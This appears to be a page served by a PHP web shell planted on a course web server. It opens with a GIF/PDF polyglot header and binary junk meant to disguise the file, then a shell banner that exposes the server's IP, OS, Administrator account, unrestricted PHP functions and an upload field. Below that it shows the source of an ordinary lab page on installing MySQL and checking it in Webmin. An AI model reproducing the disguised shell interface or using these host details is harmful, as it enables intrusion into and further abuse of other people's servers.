GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2608/Labs/Lab09/ |
Upload File : |
<? // /JimMartinson/CST2608/Labs/Lab09/Lab09.phpinc require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. require('JimMartinson/CST2608/Labs/StudentServerNameNAT.phpinc'); require('common/Browser/Browser.phpinc'); $disabled = ''; $disabled = ' disabled'; $uploadFilename = $courseNumber.'-'.$evaluationName.'-MySQL-'.$userFileName.'.png'; ?> <fieldset><legend>Description</legend> The purpose of this lab is to install MySQL server. <br><span class="note normal">DO NOT PERFORM THIS LAB UNTIL Lab 3.5 has been successfully performed.</span> <?=$gradeNote?> <? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <fieldset><legend>Lab Instruction</legend> Create a folder for this <?=strtolower($evaluationType)?> named <b class="copyText"><?=$evaluationName?></b> and keep all documents used for <?=$evaluationType?> <?=$evaluationNumber?> in that folder. <ol id="main" class="count"> <li>Create a folder for this <?=strtolower($evaluationType)?> named <b><?=$evaluationName?></b> and keep all documents used for <?=$evaluationType?> <?=$evaluationNumber?> in that folder. <li>Install the MySQL server as directed by <a href="https://help.ubuntu.com/18.04/serverguide/mysql.html">Databases / MySQL</a>.</li> <li>Verify Webmin can manage your <b>MySQL server</b>. <ol> <li>Open a browser and open Webmin by going to <b class="copyText">https://<?=$Uservername?>.<?=$domain?>:10000</b>.</li> <li>Go to <b>Servers</b>/<b>MySQL</b> <span class="note">You may have to click the <img src="images/RefreshModules.png" width="119" height="18" alt="Refresh Modules"> link in the lower left for it to show up.</span></li> <li><b class="info">Take a screenshot</b> and as <b class="copyText" style="white-space:nowrap;"><?=$uploadFilename?></b>. <? showBegin('See example Webmin browser window'); BrowserBegin('Webmin','https://jimmar16.mar.loc:10000/mysql/?xnavigation=1'); ?> <img src="images/Webmin.png" width="1000" alt=""><? BrowserEnd(); /** / width is image+22 height is image+60 /**/ showEnd(); ?> </li> </ol> </li> <li>Turn in your assignment: <ol type="a"> <!--<li>Copy <code>/etc/mysql/my.conf</code> to your <b><?=$evaluationName?></b> folder.</li>--> <!--<li>Make sure the following files are in your <b><?=$evaluationName?></b> folder:--> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li> </ol> </li> </ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>